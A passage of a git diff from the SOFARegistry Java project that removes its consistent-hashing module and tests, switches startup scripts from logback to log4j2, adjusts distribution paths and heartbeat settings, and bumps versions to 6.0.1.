circle.put(hashFunction.hash(node.getNodeName() + SIGN + i), node); - } - } - - /** - * This returns the closest node for the object. If the object is the node it - * should be an exact hit, but if it is a value traverse to find closest - * subsequent node. - * @param key the key - * @return node for - */ - public T getNodeFor(Object key) { - if (circle.isEmpty()) { - return null; - } - int hash = hashFunction.hash(key); - T node = circle.get(hash); - - if (node == null) { - // inexact match -- find the next value in the circle - SortedMap tailMap = circle.tailMap(hash); - hash = tailMap.isEmpty() ? circle.firstKey() : tailMap.firstKey(); - node = circle.get(hash); - } - return node; - } - - /** - * This returns the closest n unique nodes in order for the object. - * - * This will return a list that has all nodes if n > number of nodes. - * - * @param key the key - * @param n the n - * @return the n unique nodes for - */ - public List getNUniqueNodesFor(Object key, int n) { - if (circle.isEmpty()) { - return Collections.emptyList(); - } - - if (n > realNodes.size()) { - n = realNodes.size(); - } - - List list = new ArrayList<>(n); - int hash = hashFunction.hash(key); - for (int i = 0; i < n; i++) { - if (!circle.containsKey(hash)) { - // go to next element. - SortedMap tailMap = circle.tailMap(hash); - hash = tailMap.isEmpty() ? circle.firstKey() : tailMap.firstKey(); - } - T candidate = circle.get(hash); - if (!list.contains(candidate)) { - list.add(candidate); - } else { - i--; // try again. - } - // find the next element in the circle - hash++; - } - return list; - } -} diff --git a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/HashNode.java b/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/HashNode.java deleted file mode 100644 index 684f8541b..000000000 --- a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/HashNode.java +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -/** - * The interface Hash node. - * @author zhuoyu.sjw - * @version $Id : HashNode.java, v 0.1 2016-11-01 15:30 zhuoyu.sjw Exp $$ - */ -public interface HashNode { - - /** - * Gets node name. - * - * @return node name - */ - String getNodeName(); -} diff --git a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/MD5HashFunction.java b/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/MD5HashFunction.java deleted file mode 100644 index 0959c621b..000000000 --- a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/MD5HashFunction.java +++ /dev/null @@ -1,58 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -import java.nio.charset.Charset; - -/** - * MD5 hash function - * @author zhuoyu.sjw - * @version $Id: MD5HashFunction.java, v 0.1 2016-11-01 15:19 zhuoyu.sjw Exp $$ - */ -public class MD5HashFunction implements HashFunction { - - /** - * Default charset of UTF-8 - */ - private static final Charset UTF8 = Charset.forName("UTF-8"); - - /** - * Instantiates a new MD5 hash function. - */ - public MD5HashFunction() { - } - - /** - * @see HashFunction#hash(Object) - */ - @Override - public int hash(Object s) { - byte[] hash = MessageDigests.md5().digest(s.toString().getBytes(UTF8)); - - // HACK just take the first 4 digits and make it an integer. - // apparently this is what other algorithms use to turn it into an int - // value. - - int h0 = (hash[0] & 0xFF); - int h1 = (hash[1] & 0xFF) << 8; - int h2 = (hash[2] & 0xFF) << 16; - int h3 = (hash[3] & 0xFF) << 24; - - return h0 + h1 + h2 + h3; - } - -} diff --git a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/MessageDigests.java b/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/MessageDigests.java deleted file mode 100644 index 34621abcd..000000000 --- a/server/consistency/src/main/java/com/alipay/sofa/registry/consistency/hash/MessageDigests.java +++ /dev/null @@ -1,111 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -import java.security.MessageDigest; -import java.security.NoSuchAlgorithmException; - -/** - * This MessageDigests class provides convenience methods for obtaining - * thread local {@link MessageDigest} instances for MD5, SHA-1, and - * SHA-256 message digests. - * - * @author zhuoyu.sjw - * @version $Id: MessageDigests.java, v 0.1 2016-11-01 16:29 zhuoyu.sjw Exp $$ - */ -public final class MessageDigests { - - /** MD5 */ - private static final ThreadLocal MD5_DIGEST = createThreadLocalMessageDigest("MD5"); - /** SHA_1 */ - private static final ThreadLocal SHA_1_DIGEST = createThreadLocalMessageDigest("SHA-1"); - /** SHA_256 */ - private static final ThreadLocal SHA_256_DIGEST = createThreadLocalMessageDigest("SHA-256"); - /** */ - private static final char[] HEX_DIGITS = "0123456789abcdef" - .toCharArray(); - - /** - * Create thread local message digest thread local. - * - * @param digest the digest - * @return thread local - */ - private static ThreadLocal createThreadLocalMessageDigest(final String digest) { - return ThreadLocal.withInitial(() -> { - try { - return MessageDigest.getInstance(digest); - } catch (NoSuchAlgorithmException e) { - throw new IllegalStateException( - "unexpected exception creating MessageDigest instance for [" + digest + "]", - e); - } - }); - } - - /** - * - * @return a thread local MD5 {@link MessageDigest} instance - */ - public static MessageDigest md5() { - return get(MD5_DIGEST); - } - - /** - * - * @return a thread local SHA_1 {@link MessageDigest} instance - */ - public static MessageDigest sha1() { - return get(SHA_1_DIGEST); - } - - /** - * - * @return a thread local SHA_256 {@link MessageDigest} instance - */ - public static MessageDigest sha256() { - return get(SHA_256_DIGEST); - } - - /** - * get and reset thread local {@link MessageDigest} instance - * @param messageDigest threadLocalMessageDigest - * @return a thread local {@link MessageDigest} instance - */ - private static MessageDigest get(ThreadLocal messageDigest) { - MessageDigest instance = messageDigest.get(); - instance.reset(); - return instance; - } - - /** - * Format a byte array as a hex string. - * - * @param bytes the input to be represented as hex. - * @return a hex representation of the input as a String. - */ - public static String toHexString(byte[] bytes) { - StringBuilder sb = new StringBuilder(2 * bytes.length); - - for (byte b : bytes) { - sb.append(HEX_DIGITS[b >> 4 & 0xf]).append(HEX_DIGITS[b & 0xf]); - } - - return sb.toString(); - } - -} diff --git a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/BackupTest.java b/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/BackupTest.java deleted file mode 100644 index 8ce57af6f..000000000 --- a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/BackupTest.java +++ /dev/null @@ -1,135 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -import org.junit.Before; -import org.junit.Test; -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; - -import java.util.ArrayList; -import java.util.Arrays; -import java.util.HashMap; -import java.util.LinkedHashMap; -import java.util.List; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: BackupTest.java, v 0.1 2018-03-20 12:12 shangyu.wh Exp $ - */ -public class BackupTest { - - private static final Logger LOGGER = LoggerFactory.getLogger(ConsistentHashTest.class); - - /** - * Sets up. - * - * @throws Exception the exception - */ - @Before - public void setUp() { - List testNodes = new ArrayList<>(); - testNodes.add(new TestNode("A")); - testNodes.add(new TestNode("B")); - testNodes.add(new TestNode("C")); - testNodes.add(new TestNode("D")); - testNodes.add(new TestNode("E")); - testNodes.add(new TestNode("F")); - } - - @Test - public void getNodeFor() { - String key1 = "test"; - String key2 = "dataID"; - Map> map = new HashMap<>(); - map.put(key1, Arrays.asList("1,2,3,4,5,6".split(","))); - map.put(key2, Arrays.asList("5,6,7,8,9,0".split(","))); - - List list1 = Arrays.asList(new TestNode("A"), new TestNode("B"), - new TestNode("C"), new TestNode("D"), new TestNode("E"), new TestNode("F")); - - List list2 = Arrays.asList(new TestNode("A"), new TestNode("B"), - new TestNode("C"), new TestNode("E"), new TestNode("F")); - - printTest(list1, list2, key2, map.get(key2)); - } - - private void printTest(List before, List after, String dataId, - List dataList) { - List testNodes1 = getCalculateTestNodes(before, dataId, before.size()); - List testNodes2 = getCalculateTestNodes(after, dataId, after.size()); - - Map> testNodeMap = bindData(dataList, - getCalculateTestNodes(before, dataId, 3)); - - LOGGER.info("data map {}", testNodeMap); - - binddataDec(testNodes1, testNodes2, testNodeMap); - } - - private void binddataDec(List before, List after, - Map> testNodeMap) { - List subTestNodesBefore = new ArrayList<>(before.subList(0, 3)); - List subTestNodesAfter = new ArrayList<>(after.subList(0, 3)); - TestNode master = subTestNodesBefore.get(0); - if (subTestNodesAfter.contains(master)) { - master = subTestNodesBefore.get(0); - } else { - master = subTestNodesAfter.get(0); - } - if (subTestNodesAfter.removeAll(subTestNodesBefore)) { - List dataMaster = testNodeMap.get(master); - for (TestNode testNode : subTestNodesAfter) { - if (testNodeMap.get(testNode) == null) { - testNodeMap.put(testNode, dataMaster); - } else { - throw new RuntimeException("data error!"); - } - } - } - List newBefore = new ArrayList<>(before); - if (newBefore.removeAll(after)) { - for (TestNode testNode : newBefore) { - - testNodeMap.remove(testNode); - } - } - LOGGER.info("after map:{}", testNodeMap); - - } - - private List getCalculateTestNodes(List in, String dataId, int num) { - ConsistentHash consistentHash = new ConsistentHash<>(100, in); - List ret; - if (num > 0) { - ret = consistentHash.getNUniqueNodesFor(dataId, num); - } else { - ret = Arrays.asList(consistentHash.getNodeFor(dataId)); - } - - LOGGER.info("getNUniqueNodesFor dataId: {}, result: {}", dataId, ret); - return ret; - } - - private Map> bindData(List dataList, List nodelist) { - Map> map = new LinkedHashMap<>(); - nodelist.forEach((testNode) -> map.put(testNode, dataList)); - return map; - } -} \ No newline at end of file diff --git a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/ConsistentHashTest.java b/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/ConsistentHashTest.java deleted file mode 100644 index 8c9e8250b..000000000 --- a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/ConsistentHashTest.java +++ /dev/null @@ -1,130 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -import org.junit.Before; -import org.junit.Test; -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; - -import java.util.ArrayList; -import java.util.HashSet; -import java.util.List; - -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertNotNull; -import static org.junit.Assert.assertTrue; - -/** - * The type Consistent hash test. - * @author zhuoyu.sjw - * @version $Id : ConsistentHashTest.java, v 0.1 2018-03-07 11:24 zhuoyu.sjw Exp $$ - */ -public class ConsistentHashTest { - private static final Logger LOGGER = LoggerFactory.getLogger(ConsistentHashTest.class); - - private ConsistentHash consistentHash; - - private List testNodes; - - /** - * Sets up. - * - * @throws Exception the exception - */ - @Before - public void setUp() throws Exception { - testNodes = new ArrayList<>(); - testNodes.add(new TestNode("10.10.10.1")); - testNodes.add(new TestNode("10.10.10.2")); - testNodes.add(new TestNode("10.10.10.3")); - testNodes.add(new TestNode("10.10.10.4")); - testNodes.add(new TestNode("10.10.10.5")); - consistentHash = new ConsistentHash(100, testNodes); - } - - /** - * Gets node for. - */ - @Test - public void getNodeFor() { - String key = "test"; - TestNode testNode = consistentHash.getNodeFor(key); - - LOGGER.info("getNodeFor key: {}, result: {}", key, testNode); - - assertNotNull(testNode); - assertTrue(testNodes.contains(testNode)); - } - - /** - * Gets n unique nodes for. - */ - @Test - public void getNUniqueNodesFor() { - String key = "test"; - List uniqueNodes = consistentHash.getNUniqueNodesFor(key, 3); - - LOGGER.info("getNUniqueNodesFor key: {}, result: {}", key, uniqueNodes); - - assertNotNull(uniqueNodes); - assertEquals(uniqueNodes.size(), new HashSet<>(uniqueNodes).size()); - } - - /** - * Gets n unique nodes for real nodes size. - */ - @Test - public void getNUniqueNodesForRealNodesSize() { - String key = "test"; - List uniqueNodes = consistentHash.getNUniqueNodesFor(key, testNodes.size()); - - LOGGER.info("getNUniqueNodesForRealNodesSize key: {}, result: {}", key, uniqueNodes); - - assertNotNull(uniqueNodes); - assertEquals(testNodes.size(), new HashSet<>(uniqueNodes).size()); - } - - /** - * Gets n unique nodes for more than real nodes size. - */ - @Test - public void getNUniqueNodesForMoreThanRealNodesSize() { - String key = "test"; - List uniqueNodes = consistentHash.getNUniqueNodesFor(key, testNodes.size() + 1); - - LOGGER - .info("getNUniqueNodesForMoreThanRealNodesSize key: {}, result: {}", key, uniqueNodes); - - assertNotNull(uniqueNodes); - assertEquals(testNodes.size(), new HashSet<>(uniqueNodes).size()); - } - - /** - * Gets n unique nodes for zero. - */ - @Test - public void getNUniqueNodesForZero() { - String key = "test"; - List uniqueNodes = consistentHash.getNUniqueNodesFor(key, 0); - - LOGGER.info("getNUniqueNodesForZero key: {}, result: {}", key, uniqueNodes); - - assertNotNull(uniqueNodes); - assertTrue(uniqueNodes.isEmpty()); - } -} \ No newline at end of file diff --git a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/MessageDigestsTest.java b/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/MessageDigestsTest.java deleted file mode 100644 index 8fd823dd5..000000000 --- a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/MessageDigestsTest.java +++ /dev/null @@ -1,89 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -import org.junit.Test; - -import java.security.MessageDigest; - -import static org.junit.Assert.assertEquals; - -/** - * The type Message digests test. - * @author zhuoyu.sjw - * @version $Id : MessageDigestsTest.java, v 0.1 2018-03-07 11:19 zhuoyu.sjw Exp $$ - */ -public class MessageDigestsTest { - - /** - * Md 5. - */ - @Test - public void md5() { - assertHash("d41d8cd98f00b204e9800998ecf8427e", "", MessageDigests.md5()); - assertHash("900150983cd24fb0d6963f7d28e17f72", "abc", MessageDigests.md5()); - assertHash("8215ef0796a20bcaaae116d3876c664a", - "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", MessageDigests.md5()); - assertHash("7707d6ae4e027c70eea2a935c2296f21", - new String(new char[1000000]).replace("\0", "a"), MessageDigests.md5()); - assertHash("9e107d9d372bb6826bd81d3542a419d6", - "The quick brown fox jumps over the lazy dog", MessageDigests.md5()); - assertHash("1055d3e698d289f2af8663725127bd4b", - "The quick brown fox jumps over the lazy cog", MessageDigests.md5()); - } - - /** - * Sha 1. - */ - @Test - public void sha1() { - assertHash("da39a3ee5e6b4b0d3255bfef95601890afd80709", "", MessageDigests.sha1()); - assertHash("a9993e364706816aba3e25717850c26c9cd0d89d", "abc", MessageDigests.sha1()); - assertHash("84983e441c3bd26ebaae4aa1f95129e5e54670f1", - "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", MessageDigests.sha1()); - assertHash("34aa973cd4c4daa4f61eeb2bdbad27316534016f", - new String(new char[1000000]).replace("\0", "a"), MessageDigests.sha1()); - assertHash("2fd4e1c67a2d28fced849ee1bb76e7391b93eb12", - "The quick brown fox jumps over the lazy dog", MessageDigests.sha1()); - assertHash("de9f2c7fd25e1b3afad3e85a0bd17d9b100db4b3", - "The quick brown fox jumps over the lazy cog", MessageDigests.sha1()); - } - - /** - * Sha 256. - */ - @Test - public void sha256() { - assertHash("e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "", - MessageDigests.sha256()); - assertHash("ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad", "abc", - MessageDigests.sha256()); - assertHash("248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1", - "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq", MessageDigests.sha256()); - assertHash("cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0", new String( - new char[1000000]).replace("\0", "a"), MessageDigests.sha256()); - assertHash("d7a8fbb307d7809469ca9abcb0082e4f8d5651e46d3cdb762d02d0bf37c9e592", - "The quick brown fox jumps over the lazy dog", MessageDigests.sha256()); - assertHash("e4c4d8f3bf76b692de791a173e05321150f7a345b46484fe427f6acc7ecc81be", - "The quick brown fox jumps over the lazy cog", MessageDigests.sha256()); - } - - private void assertHash(String expected, String test, MessageDigest messageDigest) { - String actual = MessageDigests.toHexString(messageDigest.digest(test.getBytes())); - assertEquals(expected, actual); - } -} \ No newline at end of file diff --git a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/TestNode.java b/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/TestNode.java deleted file mode 100644 index 513b5af28..000000000 --- a/server/consistency/src/test/java/com/alipay/sofa/registry/consistency/hash/TestNode.java +++ /dev/null @@ -1,86 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.consistency.hash; - -/** - * The type Test node. - * @author zhuoyu.sjw - * @version $Id : TestNode.java, v 0.1 2018-03-07 11:23 zhuoyu.sjw Exp $$ - */ -public class TestNode implements HashNode { - - private String nodeName; - - /** - * Instantiates a new Test node. - * - * @param nodeName the node name - */ - public TestNode(String nodeName) { - this.nodeName = nodeName; - } - - /** - * Gets node name. - * - * @return the node name - */ - @Override - public String getNodeName() { - return nodeName; - } - - /** - * Equals boolean. - * - * @param o the o - * @return the boolean - */ - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (!(o instanceof TestNode)) { - return false; - } - - TestNode testNode = (TestNode) o; - - return nodeName != null ? nodeName.equals(testNode.nodeName) : testNode.nodeName == null; - } - - /** - * Hash code int. - * - * @return the int - */ - @Override - public int hashCode() { - return nodeName != null ? nodeName.hashCode() : 0; - } - - /** - * To string string. - * - * @return the string - */ - @Override - public String toString() { - return "TestNode{" + "nodeName='" + nodeName + '\'' + '}'; - } -} diff --git a/server/distribution/data/bin/startup.bat b/server/distribution/data/bin/startup.bat index 69e1c2213..6db993b35 100755 --- a/server/distribution/data/bin/startup.bat +++ b/server/distribution/data/bin/startup.bat @@ -28,7 +28,7 @@ rem set user.home set "JAVA_OPT=%JAVA_OPT% -Duser.home=%BASE_DIR%" rem springboot conf -set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% --logging.config=%BASE_DIR%\conf\logback-spring.xml" +set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=%BASE_DIR%\conf\log4j2.xml -Dlog4j.configurationFile=%BASE_DIR%\conf\log4j2.xml" rem heap size set HEAP_MAX=512 diff --git a/server/distribution/data/bin/startup.sh b/server/distribution/data/bin/startup.sh index c59697da0..b998f7521 100644 --- a/server/distribution/data/bin/startup.sh +++ b/server/distribution/data/bin/startup.sh @@ -26,7 +26,7 @@ JAVA_OPTS="$JAVA_OPTS -Dspring.config.location=${BASE_DIR}/conf/application.prop JAVA_OPTS="$JAVA_OPTS -Duser.home=${BASE_DIR}" # springboot conf -SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} --logging.config=${BASE_DIR}/conf/logback-spring.xml" +SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=${BASE_DIR}/conf/log4j2.xml -Dlog4j.configurationFile=${BASE_DIR}/conf/log4j2.xml" # heap size HEAP_MAX=512 diff --git a/server/distribution/data/conf/application.properties b/server/distribution/data/conf/application.properties index f5ed68c49..28027cb25 100644 --- a/server/distribution/data/conf/application.properties +++ b/server/distribution/data/conf/application.properties @@ -1,3 +1,2 @@ nodes.metaNode=DefaultDataCenter:localhost -nodes.localDataCenter=DefaultDataCenter -data.server.numberOfReplicas=1 \ No newline at end of file +nodes.localDataCenter=DefaultDataCenter \ No newline at end of file diff --git a/server/distribution/data/distribution-data.xml b/server/distribution/data/distribution-data.xml index b6a029b0e..6c9c9555e 100644 --- a/server/distribution/data/distribution-data.xml +++ b/server/distribution/data/distribution-data.xml @@ -22,17 +22,17 @@ ../../server/data/target/registry-server-data-executable.jar - / + ./ registry-data.jar - ../../server/data/src/main/resources/logback-spring.xml - /conf - logback-spring.xml + ../../server/data/src/main/resources/log4j2.xml + ./conf + log4j2.xml ../version - / + ./ version_${project.version} diff --git a/server/distribution/data/pom.xml b/server/distribution/data/pom.xml index 12bbdfe43..e74484256 100644 --- a/server/distribution/data/pom.xml +++ b/server/distribution/data/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-distribution - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/distribution/integration/bin/startup.bat b/server/distribution/integration/bin/startup.bat index f8992ec00..db51c9082 100755 --- a/server/distribution/integration/bin/startup.bat +++ b/server/distribution/integration/bin/startup.bat @@ -28,7 +28,7 @@ rem set user.home set "JAVA_OPT=%JAVA_OPT% -Duser.home=%BASE_DIR%" rem springboot conf -set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% --logging.config=%BASE_DIR%\conf\logback-spring.xml" +set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=%BASE_DIR%\conf\log4j2.xml -Dlog4j.configurationFile=%BASE_DIR%\conf\log4j2.xml" rem heap size set HEAP_MAX=512 diff --git a/server/distribution/integration/bin/startup.sh b/server/distribution/integration/bin/startup.sh index 653e4b55e..d995b7c0e 100644 --- a/server/distribution/integration/bin/startup.sh +++ b/server/distribution/integration/bin/startup.sh @@ -26,7 +26,7 @@ JAVA_OPTS="$JAVA_OPTS -Dspring.config.location=${BASE_DIR}/conf/application.prop JAVA_OPTS="$JAVA_OPTS -Duser.home=${BASE_DIR}" # springboot conf -SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} --logging.config=${BASE_DIR}/conf/logback-spring.xml" +SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=${BASE_DIR}/conf/log4j2.xml -Dlog4j.configurationFile=${BASE_DIR}/conf/log4j2.xml" # heap size HEAP_MAX=512 diff --git a/server/distribution/integration/conf/application.properties.example b/server/distribution/integration/conf/application.properties.example index 3ecb93291..513b6c425 100644 --- a/server/distribution/integration/conf/application.properties.example +++ b/server/distribution/integration/conf/application.properties.example @@ -42,9 +42,9 @@ session.server.printTask.fixedDelay=30000 session.server.schedulerCheckVersionTimeout=3 session.server.schedulerCheckVersionFirstDelay=3 session.server.schedulerCheckVersionExpBackOffBound=10 -session.server.schedulerHeartbeatTimeout=30 -session.server.schedulerHeartbeatFirstDelay=30 -session.server.schedulerHeartbeatExpBackOffBound=10 +session.server.schedulerHeartbeatTimeout=3 +session.server.schedulerHeartbeatFirstDelay=3 +session.server.schedulerHeartbeatExpBackOffBound=1 session.server.schedulerFetchDataTimeout=3 session.server.schedulerFetchDataFirstDelay=3 session.server.schedulerFetchDataExpBackOffBound=10 diff --git a/server/distribution/integration/distribution-integration.xml b/server/distribution/integration/distribution-integration.xml index effdaf0fd..60eca02f5 100644 --- a/server/distribution/integration/distribution-integration.xml +++ b/server/distribution/integration/distribution-integration.xml @@ -22,17 +22,17 @@ ../../server/integration/target/registry-server-integration-executable.jar - / + ./ registry-integration.jar - ../../server/integration/src/main/resources/logback-spring.xml - /conf - logback-spring.xml + ../../server/integration/src/main/resources/log4j2.xml + ./conf + log4j2.xml ../version - / + ./ version_${project.version} diff --git a/server/distribution/integration/pom.xml b/server/distribution/integration/pom.xml index d1bb77c6b..7266c979c 100644 --- a/server/distribution/integration/pom.xml +++ b/server/distribution/integration/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-distribution - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/distribution/meta/bin/startup.bat b/server/distribution/meta/bin/startup.bat index ff3ca84ff..b0fa1007a 100755 --- a/server/distribution/meta/bin/startup.bat +++ b/server/distribution/meta/bin/startup.bat @@ -28,7 +28,7 @@ rem set user.home set "JAVA_OPT=%JAVA_OPT% -Duser.home=%BASE_DIR%" rem springboot conf -set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% --logging.config=%BASE_DIR%\conf\logback-spring.xml" +set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=%BASE_DIR%\conf\log4j2.xml -Dlog4j.configurationFile=%BASE_DIR%\conf\log4j2.xml" rem heap size set HEAP_MAX=512 diff --git a/server/distribution/meta/bin/startup.sh b/server/distribution/meta/bin/startup.sh index 4eb27fa74..8987aa217 100644 --- a/server/distribution/meta/bin/startup.sh +++ b/server/distribution/meta/bin/startup.sh @@ -26,7 +26,7 @@ JAVA_OPTS="$JAVA_OPTS -Dspring.config.location=${BASE_DIR}/conf/application.prop JAVA_OPTS="$JAVA_OPTS -Duser.home=${BASE_DIR}" # springboot conf -SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} --logging.config=${BASE_DIR}/conf/logback-spring.xml" +SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=${BASE_DIR}/conf/log4j2.xml -Dlog4j.configurationFile=${BASE_DIR}/conf/log4j2.xml" # heap size HEAP_MAX=512 diff --git a/server/distribution/meta/distribution-meta.xml b/server/distribution/meta/distribution-meta.xml index 29cf277c4..f81f4b90f 100644 --- a/server/distribution/meta/distribution-meta.xml +++ b/server/distribution/meta/distribution-meta.xml @@ -22,17 +22,17 @@ ../../server/meta/target/registry-server-meta-executable.jar - / + ./ registry-meta.jar - ../../server/meta/src/main/resources/logback-spring.xml - /conf - logback-spring.xml + ../../server/meta/src/main/resources/log4j2.xml + ./conf + log4j2.xml ../version - / + ./ version_${project.version} diff --git a/server/distribution/meta/pom.xml b/server/distribution/meta/pom.xml index 3d7303499..3e068a166 100644 --- a/server/distribution/meta/pom.xml +++ b/server/distribution/meta/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-distribution - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/distribution/pom.xml b/server/distribution/pom.xml index 2e13d59b6..ca329c4bd 100644 --- a/server/distribution/pom.xml +++ b/server/distribution/pom.xml @@ -6,7 +6,7 @@ com.alipay.sofa registry-server-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/distribution/session/bin/startup.bat b/server/distribution/session/bin/startup.bat index 7bf30ea7f..90fa215f2 100755 